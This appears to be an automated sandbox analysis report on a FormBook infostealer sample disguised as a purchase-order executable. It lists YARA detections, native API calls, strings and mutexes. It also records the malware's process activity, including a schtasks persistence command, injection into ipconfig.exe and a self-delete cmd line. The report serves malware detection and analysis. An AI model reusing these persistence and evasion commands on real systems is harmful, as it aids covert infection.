Source: PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cniy
Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp | String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: PO_210223.exe, 00000000.00000002.679711505.0000000001030000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            Yara detected FormBook
            Source: Yara match | File source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.2.PO_210223.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.2.PO_210223.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.PO_210223.exe.4573fe0.2.raw.unpack, type: UNPACKEDPE

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 9.2.PO_210223.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 9.2.PO_210223.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 9.2.PO_210223.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 9.2.PO_210223.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.PO_210223.exe.4573fe0.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.PO_210223.exe.4573fe0.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Initial sample is a PE file and has a suspicious name
            Source: initial sample | Static PE information: Filename: PO_210223.exe
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_00419D50 NtCreateFile,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_00419E00 NtReadFile,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_00419E80 NtClose,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_00419F30 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_00419D4A NtCreateFile,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_00419F2A NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_018499A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_01849910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_018498F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_01849840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_01849860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_01849A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_01849A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_01849A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_018495D0 NtClose,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_01849540 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_01849780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_018497A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_01849710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_018496E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_01849660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_018499D0 NtCreateProcessEx,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_01849950 NtQueueApcThread,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_018498A0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_01849820 NtEnumerateKey,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_0184B040 NtSuspendThread,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_0184A3B0 NtGetContextThread,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_01849B00 NtSetValueKey,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_01849A80 NtOpenDirectoryObject,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_01849A10 NtQuerySection,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_018495F0 NtQueryInformationFile,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_01849520 NtWaitForSingleObject,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_0184AD30 NtSetContextThread,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_01849560 NtWriteFile,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_01849FE0 NtCreateMutant,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_0184A710 NtOpenProcessToken,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_01849730 NtQueryVirtualMemory,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_01849760 NtOpenProcess,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_0184A770 NtOpenThread,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_01849770 NtSetInformationFile,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_018496D0 NtCreateKey,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_01849610 NtEnumerateValueKey,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_01849650 NtQueryValueKey,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 9_2_01849670 NtQueryInformationProcess,
            Source: C:\Windows\explorer.exe | Code function: 10_2_04E0DA32 NtCreateFile,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_03499710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_03499FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_03499780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_03499A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_034996D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_034996E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_03499540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_03499910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_034995D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_034999A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_03499840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_03499860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_03499760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_03499770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_0349A770 NtOpenThread,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_03499B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_0349A710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_03499730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_034997A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_0349A3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_03499650 NtQueryValueKey,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_03499660 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_03499670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_03499A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_03499610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_03499A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_03499A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_03499A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_03499950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_03499560 NtWriteFile,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_03499520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_0349AD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_034999D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_034995F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_0349B040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_03499820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_034998F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_034998A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_009C9D50 NtCreateFile,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_009C9E80 NtClose,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_009C9E00 NtReadFile,
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 13_2_009C9D4A NtCreateFile,
            Source: C:\Users\user\Desktop\PO_210223.exe | Code function: String function: 0180B150 appears 35 times
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: String function: 0345B150 appears 35 times
            Source: PO_210223.exe | Binary or memory string: OriginalFilename vs PO_210223.exe
            Source: PO_210223.exe, 00000000.00000000.641235536.0000000000956000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameUCOMITypeComp.exe6 vs PO_210223.exe
            Source: PO_210223.exe, 00000000.00000002.689224282.000000000B660000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs PO_210223.exe
            Source: PO_210223.exe, 00000000.00000002.689224282.000000000B660000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs PO_210223.exe
            Source: PO_210223.exe, 00000000.00000002.687139133.0000000009840000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs PO_210223.exe
            Source: PO_210223.exe, 00000000.00000002.687388801.00000000099C0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameLegacyPathHandling.dllN vs PO_210223.exe
            Source: PO_210223.exe, 00000000.00000002.688279597.000000000B570000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs PO_210223.exe
            Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameriched20.dllp( vs PO_210223.exe
            Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp | Binary or memory string: k,\\StringFileInfo\\000004B0\\OriginalFilename vs PO_210223.exe
            Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameAsyncState.dllF vs PO_210223.exe
            Source: PO_210223.exe, 00000000.00000002.679711505.0000000001030000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs PO_210223.exe
            Source: PO_210223.exe, 00000009.00000002.715919446.00000000016E7000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameipconfig.exej% vs PO_210223.exe
            Source: PO_210223.exe, 00000009.00000000.673088328.0000000000CF6000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameUCOMITypeComp.exe6 vs PO_210223.exe
            Source: PO_210223.exe, 00000009.00000002.716615748.0000000001A8F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO_210223.exe
            Source: PO_210223.exe | Binary or memory string: OriginalFilenameUCOMITypeComp.exe6 vs PO_210223.exe
            Source: PO_210223.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 9.2.PO_210223.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 9.2.PO_210223.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 9.2.PO_210223.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 9.2.PO_210223.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.PO_210223.exe.4573fe0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.PO_210223.exe.4573fe0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: classification engineClassification label: mal100.troj.evad.winEXE@10/4@3/3
            Source: C:\Users\user\Desktop\PO_210223.exeFile created: C:\Users\user\AppData\Roaming\kwqifureL.exeJump to behavior
            Source: C:\Users\user\Desktop\PO_210223.exeMutant created: \Sessions\1\BaseNamedObjects\kOfurgeHGWQSiueuJ
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1744:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7092:120:WilError_01
            Source: C:\Users\user\Desktop\PO_210223.exeFile created: C:\Users\user\AppData\Local\Temp\tmp33D2.tmpJump to behavior
            Source: PO_210223.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\PO_210223.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\PO_210223.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\PO_210223.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
            Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
            Source: PO_210223.exeVirustotal: Detection: 31%
            Source: PO_210223.exeReversingLabs: Detection: 42%
            Source: C:\Users\user\Desktop\PO_210223.exeFile read: C:\Users\user\Desktop\PO_210223.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\PO_210223.exe 'C:\Users\user\Desktop\PO_210223.exe'
            Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\Desktop\PO_210223.exe C:\Users\user\Desktop\PO_210223.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO_210223.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\PO_210223.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp'
            Source: C:\Users\user\Desktop\PO_210223.exeProcess created: C:\Users\user\Desktop\PO_210223.exe C:\Users\user\Desktop\PO_210223.exe
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO_210223.exe'
            Source: C:\Users\user\Desktop\PO_210223.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
            Source: C:\Users\user\Desktop\PO_210223.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: PO_210223.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: PO_210223.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: ipconfig.pdb source: PO_210223.exe, 00000009.00000002.715896040.00000000016E0000.00000040.00000001.sdmp
            Source: Binary string: ipconfig.pdbGCTL source: PO_210223.exe, 00000009.00000002.715896040.00000000016E0000.00000040.00000001.sdmp
